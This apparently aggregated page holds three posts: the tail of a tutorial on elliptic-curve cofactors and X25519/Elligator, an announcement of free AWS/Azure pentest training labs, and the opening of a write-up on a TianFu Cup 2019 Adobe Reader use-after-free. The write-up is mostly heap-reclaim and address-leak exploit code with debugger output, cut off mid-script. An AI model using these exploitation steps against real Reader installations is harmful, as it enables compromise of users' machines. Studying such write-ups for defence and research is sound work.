8 have order 5. 0 has order 1. Finally, prime-order groups are groups with a prime number of elements. They are all cyclic. What's great about them is their uniform structure: every element (except zero) can generate the whole group. Take for instance the group [0..10] (which has order 11). Every element except 0 is a generator: (Note: from now on, I will use the notation A.4 to denote A+A+A+A. This is called "scalar multiplication" (in this example, the group element is A and the scalar is 4). Since addition is associative, various tricks can speed up this scalar multiplication. I use a dot instead of "×" so we don't confuse it with ordinary multiplication, and to remind that the group element on the left of the dot is not necessarily a number.) 1.1 = 1 2.1 = 2 3.1 = 3 4.1 = 4 1.2 = 2 2.2 = 4 3.2 = 6 4.2 = 8 1.3 = 3 2.3 = 6 3.3 = 9 4.3 = 1 1.4 = 4 2.4 = 8 3.4 = 1 4.4 = 5 1.5 = 5 2.5 = 10 3.5 = 4 4.5 = 9 1.6 = 6 2.6 = 1 3.6 = 7 4.6 = 2 etc. 1.7 = 7 2.7 = 3 3.7 = 10 4.7 = 6 1.8 = 8 2.8 = 5 3.8 = 2 4.8 = 10 1.9 = 9 2.9 = 7 3.9 = 5 4.9 = 3 1.10 = 10 2.10 = 9 3.10 = 8 4.10 = 7 1.11 = 0 2.11 = 0 3.11 = 0 4.11 = 0 You get the idea. In practice, we can't distinguish group elements from each other: apart from zero, they all have the same properties. That's why discrete logarithm is so difficult: there is no structure to latch on to, so an attacker would mostly have to resort to brute force. (Okay, I lied. Natural numbers do have some structure to latch on to, which is why RSA keys need to be so damn huge. Elliptic curves – besides treacherous exceptions – don't have a known exploitable structure.) The cofactor So what we want is a group of order P, where P is a big honking prime. Unfortunately, the simplest and most efficient elliptic curves out there – those that can be expressed in Montgomery and Edwards form – don't give us that. Instead, they have order P×H, where P is suitably large, and H is a small number (often 4 or 8): the cofactor. Let's illustrate this with the cyclic group [0..43], of order 44. How much structure can we latch on to? 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 Since 44 is not prime, not all elements will have order 44. For instance: 1 has order 44 2 has order 22 3 has order 44 4 has order 11 … You get the idea. When we go over all numbers, we notice that the order of each element is not arbitrary. It is either 1, 2, 4, 11, 22, or 44. Note that 44 = 11 × 2 × 2. We can see were the various orders come from: 1, 2, 2×2, 11, 11×2, 11×2×2. The order of an element is easy to test: just multiply by the order to test, see if it yields zero. For instance (remember A.4 is a short hand for A+A+A+A, and we're working modulo 44 – the order of the group): 8 . 11 = 0 -- prime order 24 . 11 = 0 -- prime order 25 . 11 = 33 -- not prime order 11 . 4 = 0 -- low order 33 . 4 = 0 -- low order 25 . 4 = 12 -- not low order ("Low order" means orders below 11: 1, 2, 4. Not much lower than 11, but if we replace 11 by a large prime P, the term "low order" makes more sense.) Understandably, there are only few elements of low order: 0, 11, 22, and 33. 0 has order 1, 22 has order 2, 11 and 33 have order 4. Like the column on the left, they form a proper subgroup. It's easier to see by swapping and rotating the columns a bit: 0 11 22 33 4 15 26 37 8 19 30 41 12 23 34 1 16 27 38 5 20 31 42 9 24 35 2 13 28 39 6 17 32 43 10 21 36 3 14 25 40 7 18 29 The low order subgroup is shown on the first line. And now we can finally see the structure of this group: a narrow rectangle, with 11 lines and 4 columns, where each element in this rectangle is the sum of an element of prime order, and an element of low order. For instance: 30 = 8 + 22 = 4.2 + 11.2 35 = 24 + 11 = 4.6 + 11.1 1 = 12 + 33 = 4.3 + 11.3 You just have to look left and up to know which elements to sum. To do this algebraically, you need to multiply by the right scalar. You need to clear the (co)factor. Let's first look left. How do we clear the cofactor? We start by an element that can be expressed thus: E = 4.a + 11.b What we want to find is the scalar s such that E.s = 4.a Note that E.s = (4.a + 11.b).s E.s = 4.a.s + 11.b.s E.s = 4.(a×s) + 11.(b×s) E.s = 4.(a×1) + 11.(b×0) Recall that 4 has order 11, and 11 has order 4. So s must follow these equations: s = 1 mod 11 -- preserve a s = 0 mod 4 -- absorb b There's only one such scalar between 0 and 44: 12. So, multiplying by 12 clears the cofactor, and preserves the prime factor. For instance: 13.12 = 24 27.12 = 16 42.12 = 20 Now we know how to look left. To look up, we follow the same reasoning, except this time, our scalar s must follow these equations: s = 0 mod 11 -- absorb a s = 1 mod 4 -- preserve b That's 33. For instance: 13.33 = 33 27.33 = 11 42.33 = 22 Now we can look up as well. (Note: This "looking up" and "looking left" terminology isn't established mathematical terminology, but rather a hopefully helpful illustration. Do not ask established mathematicians or cryptographers about "looking up" and "looking left" without expecting them to be at least somewhat confused.) Torsion safe representatives We now have an easy way to project elements in the prime-order subgroup. Just look left by multiplying the element by the appropriate scalar (in the case of our [0..43] group, that's 12). That lets us treat each line of the rectangle as an equivalence class, with one canonical representative: the leftmost element – the one that is on the prime-order subgroup. This effectively gets us what we want: a prime-order group. Let's say we have a scalar s and an element E, which are not guaranteed to be on the prime-order subgroup. We want to know in which line their scalar multiplication will land, and we want to represent that line by its leftmost element. To do so, we just need to perform the scalar multiplication, then look left. For instance: s = 7 -- some random scalar E = 31 -- some random point E.s = 41 result = (E.s).12 = 8 Or we could first project E to the left, then perform the scalar multiplication. It will stay on the left column, and give us the same result: E = 31 E . 12 = 20 result = (E.12).s = 8 The problem with this approach is that it is slow. We're performing two scalar multiplications instead of just one. That kind of defeats the purpose of choosing a fast curve to begin with. We need something better. Let us look at our result one more time: result = (E.s).12 = 8 result = (E.12).s = 8 It would seem the order in which we do the scalar multiplications does not matter. Indeed, the associativity of group addition means we can rely on the following: (E.s).t = E.(s×t) = E.(t×s) = (E.t).s Now you can see that we can avoid performing two scalar multiplications, and multiply the two scalars instead. To go back to our example: s = 7 -- our random scalar E = 31 -- our random point result = E.(7×12) -- scalarmult and look left result = E.(84) result = E.(40) -- because 84 % 44 = 40 result = 8 Remember we are working with a cyclic group of order 44: adding an element to itself 84 times is like adding it to itself 44 times (the result is zero), and again 40 times. So better reduce the scalar modulo the group order so we can have a cheaper scalar multiplication. Let's recap: s = 7 -- our random scalar E = 31 -- our random point E.s = 41 E.(s×12) = 8 41 and 8 are on the same line, and 8 is in the prime-order subgroup. Multiplying by s×12 instead of s preserved the main factor, and cleared the cofactor. Because of this, we call s×12 the torsion safe representative of s. Now computing (s×12) % 44 may be simple, but it doesn't look very cheap. Thankfully, we're not out of performance tricks: (s×12) % 44 = (s×(11+1)) % 44 = (s×(11+1)) % 44 = (s + (s × 11)) % 44 = s + (s × 11) % 44 -- we assume s < 11 = s + (s%4 × 11) -- we can remove %44 We only need to add s and and a multiple of 11 (0, 11, 2×11, or 3×11). The result is guaranteed to be under the group order (44). The total cost is: Multiplying the prime order by a small number. Adding two scalars together. Compared to the scalar multiplication, that's practically free. Decoupling main factor and cofactor We just found the torsion safe representative of a scalar, that after scalar multiplication preserves the line, and only chooses the left column. In some cases, we may want to reverse roles: preserve the column, and and only chose the top line. In other words, we want to do the equivalent of performing the scalar multiplication, then looking up. The reasoning is the same as for torsion safe representatives, only flipped on its head. Instead of multiplying our scalar by 12 (which is a multiple of the low order, equals 1 modulo the prime order), we want to multiply it by 33: a multiple of the prime order, which equals 1 modulo the low order. Again, modular multiplication by 33 is not cheap, so we repeat our performance trick: (s×33) % 44 = (s×11×3) % (11×4) = ((s×3) % 4) × 11 In this case, we just have to compute (s×3) % 4 and multiply the prime order by that small number. The total cost is just the multiplication of the order by a very small number. Now we can do the decoupling: s = 7 -- some random scalar E = 31 -- some random point E.s = 41 -- normal result E.(s×12) = 8 E.(s×33) = 33 E.s = 8 + 33 = 41 -- decoupled result Cofactor and discrete logarithm Time to start applying our knowledge. Let's say I have elements A and B, and a scalar s such that B = A.s. The discrete logarithm problem is about finding s when you already know A and B. If we're working in a prime-order group with a sufficiently big prime, that problem is intractable. But we're not working with a prime-order group. We have a cofactor to deal with. Let's go back to our group of order 44: 0 11 22 33 4 15 26 37 8 19 30 41 12 23 34 1 16 27 38 5 20 31 42 9 24 35 2 13 28 39 6 17 32 43 10 21 36 3 14 25 40 7 18 29 We can easily recover the line and the column of A and B, so let's do that. Take for instance A = 27 and B = 15. Now let's find s. A = 27 A = 16 + 11 A = 4.4 + 11.1 B = 15 B = 4 + 11 B = 4.1 + 11.1 B = A . s 4.1 + 11.1 = (4.4 + 11.1) . s 4.1 + 11.1 = (4.4).s + (11.1).s 4 .1 = (4 .4).s 11.1 = (11.1).s Now look at that last line. Since 11 has only order 4, there are only 4 possible solutions, which are easy to brute force. We can try them all and easily see that: 11 . 1 = (11.1).1 (mod 44) s mod 4 = 1 The other equation however is more of a problem. There are 11 possible solutions, and trying them all is more expensive: 4 . 1 ≠ (4.4).1 4 . 1 ≠ (4.4).2 4 . 1 = (4.4).3 s mod 11 = 3 Now that we know both moduli, we can deduce that s = 25: A . s = B 27.25 = 15 What we just did here is reducing the discrete logarithm into two, easier discrete logarithms. Such divide and conquer is the reason why we want prime-order groups, where the difficulty of the discrete logarithm is the square root of the prime order (square root because there are cleverer brute force methods than just trying all possibilities). Here however, the difficulty wasn't the square root of 44. It was sqrt(11) + sqrt(2) + sqrt(2), which is significantly lower. The elliptic curves we are interested in however have much bigger orders. Curve25519 for instance has order 8 × L where L is 2²⁵² + something (and the cofactor is 8). So the difficulty of solving discrete logarithm for Curve25519 is sqrt(2)×3 + sqrt(2²⁵²), or approximately 2¹²⁶. Still lower than sqrt(8×L) (about 2¹²⁷), but not low enough to be worrying: discrete logarithm is still intractable. Cofactor and X25519 Elliptic curves can have a small cofactor, and still guarantee we can't solve discrete logarithm. There's still a problem however: the attacker can still solve the easy half of discrete logarithm, and deduce the value of s, modulo the cofactor. In the case of Curve25519, that means 3 bits of information, that could be read, or even controlled by the attacker. That's not ideal, so DJB rolled two tricks up his sleeve: The chosen base point of the curve has order L, not 8×L. Multiplying that point by our secret scalar, can then only generate points on the prime-order subgroup (the leftmost column). The three bits of information the attacker could have had are just absorbed by that base point. The scalar is clamped. Bit 255 is cleared and bit 254 is set to prevent timing leaks in poor implementations, and put a lower bound on standard attacks. More importantly, bits 0, 1, and 2 are cleared, to make sure the scalar is a multiple of 8. This guarantees that the low order component of the point, if any, will be absorbed by the scalar multiplication, such that the resulting point will be on the prime-order subgroup. The second trick is especially important: it guarantees that the scalar multiplication between your secret key and an attacker controlled point on the curve can only yield two kinds of results: A point on the curve, that has prime order. The attacker don't learn anything about your private key (at least not without solving discrete logarithm first), and they can't control which point on the curve you are computing. We're good. Zero. Okay, the attacker did manage to force this output, but this only (and always) happens when they gave you a low order point. So again, they learned nothing about your private key. And if you needed to check for low order output (some protocols, like CPace, require this check), you only need to make sure it's not zero (use a constant-time comparison, please). (I'm ignoring what happens if the point you're multiplying is not on the curve. Failing to account for that has broken systems in the past. X25519 however only transmits the x-coordinate of the point, so the worst you can have is a point on the "twist". Since the twist of Curve25519 also has a big prime order (2²⁵³ minus something) and a small cofactor (4), the results will be similar, and the attacker will learn nothing. Curve25519 is thus "twist secure".) Cofactor and Elligator Elligator was developed to help with censorship circumvention. It encodes points on the curve so that if the point is selected at random, its encoding will be indistinguishable from random. With that tool, the entire cryptographic communication is fully random, including initial ephemeral keys. This enables the construction of fully random formats, and facilitates steganography. Communication protocols often require ephemeral keys to initiate communications. In practice, they need to generate a random key pair, and send the public half over the network. Public keys however will not necessarily look random, even though the private half was indeed random. Curve25519 for instance have a number of biases: Curve25519 points are encoded in 255 bits (we only encode the x-coordinate). Since all communication happens at the byte level, there is one unused bit, which is usually cleared. This is easily remedied by simply randomising the unused bit. The x-coordinate of Curve25519 points does not span all values from 0 to 2²⁵⁵-1. Values 2²⁵⁵-19 and above never occur. In practice though, this bias is small enough to be utterly undetectable. Curve25519 points satisfy the equation y² = x³ + 486662 x² + x. All the attacker has to do is take the suspected x-coordinate, compute the right hand side of the equation, and check whether this is a square in the finite field GF(2²⁵⁵-19). For random strings, it will be about half the time. if it is a Curve25519 x-coordinate, it will be all the time. The remedy is Elligator mappings, which can decode all numbers from 0 to 2²⁵⁵-20 into a point on the curve. Encoding fails about half the time, but we can try generating key pair until we find one that can be turned into a random looking encoding. X25519 keys aren't selected at random to begin with: because of cofactor clearing, they are taken from the prime-order subgroup. Even with Elligator mappings, an attacker can decode the point, and check whether it belongs to the prime-order subgroup. Again, with X25519, this would happen all the time, unlike random representatives. When I first discovered this problem, I didn't know what to do. The remedy is fairly simple once I understood the cofactor. The real problem was reaching that understanding. So, our problem is to generate a key pair, where the public half is a random point on the whole curve, not just the prime-order subgroup. Let's again illustrate it with the [0..43] group: 0 11 22 33 4 15 26 37 8 19 30 41 12 23 34 1 16 27 38 5 20 31 42 9 24 35 2 13 28 39 6 17 32 43 10 21 36 3 14 25 40 7 18 29 Recall that the prime-order subgroup is the column on the left, and the low order subgroup is the first line. X25519 is designed in such a way that: The chosen generator of the curve has prime order. The private key is a multiple of the cofactor. For us here, this means our generator is 4, and our private key is a multiple of 4. You can check that multiplying 4 by a multiple of 4 will always yield a multiple of… 4. An element on the left column. (Remember, we're working modulo 44). But that's no good. I want to select a random element on the whole rectangle, not just the left column. If we recall our cofactor lessons, the solution is simple: add a random low order element. The random prime-order element selects the line, and the random low order element selects the column. Adding them together gives us a random element over the whole group. To add icing on the cake, this method is compatible X25519. Let's take an example. Let's first have a regular key exchange: B = 4 -- Generator of the prime-order group sa = 20 -- Alice's private key sb = 28 -- Bob's private key SA = B.sa = 4.20 = 36 -- Alice's public key SB = B.sb = 4.28 = 24 -- Bob's public key ssa = SB.sa = 24.20 = 40 -- Shared secret (computed by Alice) ssb = SA.sb = 36.28 = 40 -- Shared secret (computed by Bob) As expected of Diffie–Hellman, Alice and Bob compute the same shared secret. Now, what happens if Alice adds a low order element to properly hide her key? Let's say she adds 11 (an element of order 4). LO = 11 -- random low order point HA = SA+LO = 36+11 = 3 -- Alice's "hidden" key ssb = HA.sb = 3.28 = 40 Bob still computes the same shared secret! Which by now should not be a big surprise: scalars that are a multiple of the cofactor absorb the low order component, effectively projecting the result back in the prime order subgroup. Applying this to Curve25519 is straightforward: Select a random number, then clamp it as usual. It is now a multiple of the cofactor of the curve (8). Multiply the Curve25519 base point by that scalar. Add a low order point at random. There's a little complication, though. X25519 works on Montgomery curves, which are optimised for an x-coordinate only ladder. That ladder takes advantage of differential addition. Adding a low order point requires arbitrary addition, whose code is neither trivial nor available. We can work around that problem by starting from Edwards25519 instead: Select a random number, then clamp it as usual. It is now a multiple of the cofactor of the curve (8). Multiply the Edwards25519 base point by that scalar. Add a low order point at random. (By the way, be sure the selection of the low order point happens in constant time. Avoid naive array lookup tables.) Convert the result to Curve25519 (clamping guarantees we do not hit the treacherous exceptions of the birational map). The main advantage here is speed: Edwards25519 scalar multiplication by the base point often takes advantage of pre-computed tables, making it much faster than the Montgomery ladder in practice. (Note: pre-computed tables don't really apply to key exchange, which is why X22519 uses the Montgomery ladder instead.) This has a price however: we now depend on EdDSA code, which is not ideal if we don't compute signatures as well. Moreover, some libraries, like TweetNaCl avoid pre-computed tables to simplify the code. This makes Edwards scalar multiplication slower than the Montgomery ladder. Alternatively, there is a way to stay in Montgomery space: change the base point. Let's try it with the [0..43] group. Instead of using 4 as the base point, we'll add 11, a point whose order is the same as the cofactor (4). Our "dirty" base point is 15 (4+11). Now let's multiply that by Alice's public key: O = 11 -- low order point (order 4) B = 4 -- base point (prime order) D = B+LO = 11+4 = 15 -- "dirty" base point sa = 20 -- Alice's private key SA = B.sa = 4.20 = 36 -- Alice's public key HA = D.sa = 15.20 = 36 -- ??? Okay we have a problem: even with the dirty base point, we get the same result. That's because Alice's private key is still a multiple of the cofactor, and absorbs the low order component. But we don't want to absorb it, we want to use it, to select a column at random. Here's the trick: Use a multiple of the cofactor (4) to select the line. Use a multiple of the prime order (11) to select the column. Add those two numbers. Multiply the dirty base point by it. Note the parallel with EdDSA: we were adding points, now we add scalars. But the result is the same: d = 33 -- random multiple of the prime order da = sa+d = 20+33 = 9 -- Alice's "dirty" secret key HA = D.da = 15. 9 = 3 -- Alice's hidden key Note that we can ensure both methods yield the same results by properly decoupling the main factor and the cofactor. Now we can apply the method to Curve25519: Add a low order point of order 8 to the base point. That's our new, "dirty" base point. That can be done offline, and the result hard coded. (I personally added the Edwards25519 to a low order Edwards point, then converted the result to Montgomery.) Select a random number, then clamp it as usual. It is now a multiple of the cofactor of the curve (8). Note that if we multiply the dirty base point by that scalar, we'd absorb the low order point all over again. Select a random multiple of the prime order. For Curve25519, that means, 0, L, 2L… up to 7L. Add that multiple of L to the clamped random number above. Multiply the resulting scalar by the dirty base point. That way we no longer need EdDSA code. (Note: you can look at actual code in the implementation of the crypto_x25519_dirty_*() functions in my Monocypher cryptographic library.) Cofactor and scalar inversion Scalar inversion is useful for exponential blinding to implement Oblivious Pseudo-Random Functions (OPRF). (It will make sense soon, promise). Let's say Alice wants to connect to Bob's server, with her password. To maximise security, they use the latest and greatest in authentication technology (augmented PAKE). One important difference between that and your run of the mill password based authentication, is that Alice doesn't want to transmit her password. And Bob certainly doesn't want to transmit the salt to anyone but Alice, that would be the moral equivalent of publishing his password database. Yet we must end up somehow with Alice knowing something she can use as the salt: a blind salt, which must be a function of the password and the salt only: Blind_salt = f(password, salt) One way to do this is with exponential blinding. We start by having Alice compute a random point on the curve, which is a function of the password: P = Hash_to_point(Hash(password)) That will act as a kind of secret, hidden base point. The Hash_to_point() function can use the Elligator mappings. Note that even though P is the base point multiplied by some scalar, we cannot recover the value of that scalar (if we could, it would mean Elligator mappings could be used to solve discrete logarithm). Now Alice computes an ephemeral key pair with that base point: r = random() R = P . r She sends R to Bob. Note that as far as Bob (or any attacker) is concerned, that point R is completely random, and has no correlation with the password, or its hash. The difficulty of discrete logarithm prevents them to recover P from R alone. Now Bob uses R to transmit the blind salt: S = R . salt He sends S back to Alice, who then computes the blind salt: Blind_salt = S . (1/r) -- assuming r × (1/r) = 1 Let's go over the whole protocol: P = Hash_to_point(Hash(password)) r = random() R = P . r S = R . salt Blind_salt = S . (1/r) Blind_salt = R . salt . (1/r) Blind_salt = P . r . salt . (1/r) Blind_salt = P . (r × salt × (1/r)) Blind_salt = P . salt Blind_salt = Hash_to_point(Hash(password)) . salt And voila, our blind salt depends solely on the password and salt. You need to know the password to compute it from the salt, and if Mallory tries to connect to Bob, guessing the wrong password will give her a totally different, unexploitable blind salt. Offline dictionary attack is not possible without having hacked the database first. Now this is all very well, if we are working on a prime-order subgroup. Scalars do have an inverse modulo the order of the curve, hash to point will give us what we want… except nope, our group does not have prime order. We need to deal with the cofactor, somehow. The first problem with the cofactor comes from Hash_to_point(). When Elligator decodes a representative into a point on the curve, that point is not guaranteed to belong to the prime-order subgroup. There's the potential to leak up to 3 bits of information about the password (the cofactor of Curve25519 is 8). Fortunately, the point P is not transmitted over the network. Only R is. And this gives us the opportunity to clear the cofactor: R = P . r If the random scalar r is a multiple of 8, then R will be guaranteed to be on the prime-order subgroup, and we won't leak anything. X25519 has us covered: after clamping, r is a multiple of 8. This guarantee however goes out the window as soon as R is transmitted across the network: Mallory could instead send a bogus key that is not on the prime-order subgroup. (They could also send a point on the twist, but Curve25519 is twist secure, so let's ignore that.) Again though, X25519 takes care of this: S = R . salt Just clamp salt, and we again have a multiple of 8, and S will be guaranteed to be on the prime-order subgroup. Of course, Alice might receive some malicious S instead, so she can't assume it's the correct one. And this time, X25519 does not have us covered: Blind_salt = S . (1/r) See, X25519 clamping has a problem: while it clears the cofactor all right, it does not preserve the main factor. Which means clamping neither survives nor preserves algebraic transformations. Inverting r then clamping does not work. Clamping then inverting r does not clear the cofactor. The solution is torsion safe representatives: c = clamp(r) i = 1/c -- modulo L s = i × t -- t%L == 1 and t%8 == 0 Where L is the prime order of the curve. For Curve25519, t = 3×L + 1. The performance trick explained in the torsion safe representatives section apply as expected. (Note: you can look at actual code in the implementation of the crypto_x25519_inverse() function in Monocypher.) Conclusion Phew, done. I confess didn't think I'd need such a long post. But you get the idea: properly dealing with a cofactor these days is delicate. It's doable, but the cleaner solution these days is to use the Ristretto Group: you get modern curves and a prime order group. (Discuss on Hacker News, Reddit, Lobsters) Sursa: http://loup-vaillant.fr/tutorials/cofactor
-
Breaking and Pwning Apps and Servers on AWS and Azure - Free Training Courseware and Labs Introduction The world is changing right in front of our eyes. The way we have been learning is going to be radically transformed by the time we all have eradicated the COVID19 from our lives. While we figure out what is the best way to transfer our knowledge to you, we realise that by the time world is out of the lockdown, a cloud focussed pentesting training is likely going to be obsolete in parts. So as a contribution towards the greater security community, we decided to open source the complete training. Hope you enjoy this release and come back to us with questions, comments, feedback, new ideas or anything else that you want to let us know! Looking forward to hacking with all of you! Description Amazon Web Services (AWS) and Azure run the most popular and used cloud infrastructure and boutique of services. There is a need for security testers, Cloud/IT admins and people tasked with the role of DevSecOps to learn on how to effectively attack and test their cloud infrastructure. In this tools and techniques based training we cover attack approaches, creating your attack arsenal in the cloud, distilled deep dive into AWS and Azure services and concepts that should be used for security. The training covers a multitude of scenarios taken from our vulnerability assessment, penetration testing and OSINT engagements which take the student through the journey of discovery, identification and exploitation of security weaknesses, misconfigurations and poor programming practices that can lead to complete compromise of the cloud infrastructure. The training is meant to be a hands-on training with guided walkthroughs, scenario based attacks, coverage of tool that can be used for attacking and auditing. Due to the attack, focused nature of the training, not a lot of documentation is around security architecture, defence in depth etc. Additional references are provided in case further reading is required. To proceed, you will need An AWS account, activated for payments (you should be able to open and view the Services > EC2 page) An Azure account, you should be able to login to the Azure console About this repo This repo contains all the material from our 3 day hands on training that we have delivered at security conferences and to our numerous clients. The primary things in this repo are: documentation - all documentation in markdown format that is to be used to go through the training setup-files - files required to create a student virtual machine that will be used to create the cloud labs extras - any additional files that are relevant during the training Getting started Clone this repo Setup the student VM Host the documentation locally using gitbook Follow the docs Step 1 - Setup the student VM the documentation to setup your own student virtual machine, which is required for the training, is under documentation/setting-up/setup-student-virtual-machine.md this needs to be done first Step 2 - Documentation As all documentation is in markdown format, you can use Gitbook to host a local copy while walking through the training Steps to do this install gitbook-cli (npm install gitbook-cli -g) cd into the documentation folder gitbook serve browse to http://localhost:4000 License Documentation and Gitbook are released under Creative Commons Attribution Share Alike 4.0 International Lab material including any code, script are release under MIT License Sursa: https://github.com/appsecco/breaking-and-pwning-apps-and-servers-aws-azure-training
-
TianFu Cup 2019: Adobe Reader Exploitation Apr 10, 2020 Phan Thanh Duy Last year, I participated in the TianFu Cup competition in Chengdu, China. The chosen target was the Adobe Reader. This post will detail a use-after-free bug of JSObject. My exploit is not clean and not an optimal solution. I have finished this exploit through lots of trial and error. It involves lots of heap shaping code which I no longer remember exactly why they are there. I would highly suggest that you read the full exploit code and do the debugging yourself if necessary. This blog post was written based on a Windows 10 host with Adobe Reader. Vulnerability The vulnerability is located in the EScript.api component which is the binding layer for various JS API call. First I create an array of Sound object. SOUND_SZ = 512 SOUNDS = Array(SOUND_SZ) for(var i=0; i<512; i++) { SOUNDS[i] = this.getSound(i) SOUNDS[i].toString() } This is what a Sound object looks like in memory. The 2nd dword is a pointer to a JSObject which has elements, slots, shape, fields … etc. The 4th dword is string indicate the object’s type. I’m not sure which version of Spidermonkey that Adobe Reader is using. At first I thought this is a NativeObject but its field doesn’t seem to match Spidermonkey’s source code. If you know what this structure is or have a question, please contact me via Twitter. 0:000> dd @eax 088445d8 08479bb0 0c8299e8 00000000 085d41f0 088445e8 0e262b80 0e262f38 00000000 00000000 088445f8 0e2630d0 00000000 00000000 00000000 08844608 00000000 5b8c4400 6d6f4400 00000000 08844618 00000000 00000000 0:000> !heap -p -a @eax address 088445d8 found in _HEAP @ 4f60000 HEAP_ENTRY Size Prev Flags UserPtr UserSize - state 088445d0 000a 0000 [00] 088445d8 00048 - (busy) 0:000> da 085d41f0 085d41f0 "Sound" This 0x48 memory region and its fields are what is going to be freed and reused. Since AdobeReader.exe is a 32bit binary, I can heap spray and know exactly where my controlled data is in memory then I can overwrite this whole memory region with my controlled data and try to find a way to control PC. I failed because I don’t really know what all these fields are. I don’t have a memory leak. Adobe has CFI. So I turn my attention to the JSObject (2nd dword) instead. Also being able to fake a JSObject is a very powerful primitive. Unfortunately the 2nd dword is not on the heap. It is in a memory region which is VirtualAlloced when Adobe Reader starts. One important point to notice is the memory content is not cleared after they are freed. 0:000> !address 0c8299e8 Mapping file section regions... Mapping module regions... Mapping PEB regions... Mapping TEB and stack regions... Mapping heap regions... Mapping page heap regions... Mapping other regions... Mapping stack trace database regions... Mapping activation context regions... Usage: <unknown> Base Address: 0c800000 End Address: 0c900000 Region Size: 00100000 ( 1.000 MB) State: 00001000 MEM_COMMIT Protect: 00000004 PAGE_READWRITE Type: 00020000 MEM_PRIVATE Allocation Base: 0c800000 Allocation Protect: 00000004 PAGE_READWRITE Content source: 1 (target), length: d6618 I realized that ESObjectCreateArrayFromESVals and ESObjectCreate also allocates into this area. I used the currentValueIndices function to call ESObjectCreateArrayFromESVals: /* prepare array elements buffer */ f = this.addField("f" , "listbox", 0, [0,0,0,0]); t = Array(32) for(var i=0; i<32; i++) t[i] = i f.multipleSelection = 1 f.setItems(t) f.currentValueIndices = t // every time currentValueIndices is accessed `ESObjectCreateArrayFromESVals` is called to create a new array. for(var j=0; j<THRESHOLD_SZ; j++) f.currentValueIndices Looking at ESObjectCreateArrayFromESVals return value, we can see that our JSObject 0d2ad1f0 is not on the heap but its elements buffer at 08c621e8 are. The ffffff81 is tag for number, just as we have ffffff85 for string and ffffff87 for object. 0:000> dd @eax 0da91b00 088dfd50 0d2ad1f0 00000001 00000000 0da91b10 00000000 00000000 00000000 00000000 0da91b20 00000000 00000000 00000000 00000000 0da91b30 00000000 00000000 00000000 00000000 0da91b40 00000000 00000000 5b9868c6 88018800 0da91b50 0dbd61d8 537d56f8 00000014 0dbeb41c 0da91b60 0dbd61d8 00000030 089dfbdc 00000001 0da91b70 00000000 00000003 00000000 00000003 0:000> !heap -p -a 0da91b00 address 0da91b00 found in _HEAP @ 5570000 HEAP_ENTRY Size Prev Flags UserPtr UserSize - state 0da91af8 000a 0000 [00] 0da91b00 00048 - (busy) 0:000> dd 0d2ad1f0 0d2ad1f0 0d2883e8 0d225ac0 00000000 08c621e8 0d2ad200 0da91b00 00000000 00000000 00000000 0d2ad210 00000000 00000020 0d227130 0d2250c0 0d2ad220 00000000 553124f8 0da8dfa0 00000000 0d2ad230 00c10003 0d27d180 0d237258 00000000 0d2ad240 0d227130 0d2250c0 00000000 553124f8 0d2ad250 0da8dcd0 00000000 00c10001 0d27d200 0d2ad260 0d237258 00000000 0d227130 0d2250c0 0:000> dd 08c621e8 08c621e8 00000000 ffffff81 00000001 ffffff81 08c621f8 00000002 ffffff81 00000003 ffffff81 08c62208 00000004 ffffff81 00000005 ffffff81 08c62218 00000006 ffffff81 00000007 ffffff81 08c62228 00000008 ffffff81 00000009 ffffff81 08c62238 0000000a ffffff81 0000000b ffffff81 08c62248 0000000c ffffff81 0000000d ffffff81 08c62258 0000000e ffffff81 0000000f ffffff81 0:000> dd 08c621e8 08c621e8 00000000 ffffff81 00000001 ffffff81 08c621f8 00000002 ffffff81 00000003 ffffff81 08c62208 00000004 ffffff81 00000005 ffffff81 08c62218 00000006 ffffff81 00000007 ffffff81 08c62228 00000008 ffffff81 00000009 ffffff81 08c62238 0000000a ffffff81 0000000b ffffff81 08c62248 0000000c ffffff81 0000000d ffffff81 08c62258 0000000e ffffff81 0000000f ffffff81 0:000> !heap -p -a 08c621e8 address 08c621e8 found in _HEAP @ 5570000 HEAP_ENTRY Size Prev Flags UserPtr UserSize - state 08c621d0 0023 0000 [00] 08c621d8 00110 - (busy) So our goal now is to overwrite this elements buffer to inject a fake Javascript object. This is my plan at this point: Free Sound objects. Try to allocate dense arrays into the freed Sound objects location using currentValueIndices. Free the dense arrays. Try to allocate into the freed elements buffers Inject fake Javascript object The code below iterates through the SOUNDS array to free its elements and uses currentValueIndices to reclaim them: /* free and reclaim sound object */ RECLAIM_SZ = 512 RECLAIMS = Array(RECLAIM_SZ) THRESHOLD_SZ = 1024*6 NTRY = 3 NOBJ = 8 //18 for(var i=0; i<NOBJ; i++) { SOUNDS[i] = null //free one sound object gc() for(var j=0; j<THRESHOLD_SZ; j++) f.currentValueIndices try { //if the reclaim succeed `this.getSound` return an array instead and its first element should be 0 if (this.getSound(i)[0] == 0) { RECLAIMS[i] = this.getSound(i) } else { console.println('RECLAIM SOUND OBJECT FAILED: '+i) throw '' } } catch (err) { console.println('RECLAIM SOUND OBJECT FAILED: '+i) throw '' } gc() } console.println('RECLAIM SOUND OBJECT SUCCEED') Next, we will free all the dense arrays and try to allocate back into its elements buffer using TypedArray. I put faked integers with 0x33441122 at the start of the array to check if the reclaim succeeded. The corrupted array with our controlled elements buffer is then put into variable T: /* free all allocated array objects */ this.removeField("f") RECLAIMS = null f = null FENCES = null //free fence gc() for (var j=0; j<8; j++) SOUNDS[j] = this.getSound(j) /* reclaim freed element buffer */ for(var i=0; i<FREE_110_SZ; i++) { FREES_110[i] = new Uint32Array(64) FREES_110[i][0] = 0x33441122 FREES_110[i][1] = 0xffffff81 } T = null for(var j=0; j<8; j++) { try { // if the reclaim succeed the first element would be our injected number if (SOUNDS[j][0] == 0x33441122) { T = SOUNDS[j] break } } catch (err) {} } if (T==null) { console.println('RECLAIM element buffer FAILED') throw '' } else console.println('RECLAIM element buffer SUCCEED') From this point, we can put fake Javascript objects into our elements buffer and leak the address of objects assigned to it. The following code is used to find out which TypedArray is our fake elements buffer and leak its address. /* create and leak the address of an array buffer */ WRITE_ARRAY = new Uint32Array(8) T[0] = WRITE_ARRAY T[1] = 0x11556611 for(var i=0; i<FREE_110_SZ; i++) { if (FREES_110[i][0] != 0x33441122) { FAKE_ELES = FREES_110[i] WRITE_ARRAY_ADDR = FREES_110[i][0] console.println('WRITE_ARRAY_ADDR: ' + WRITE_ARRAY_ADDR.toString(16)) 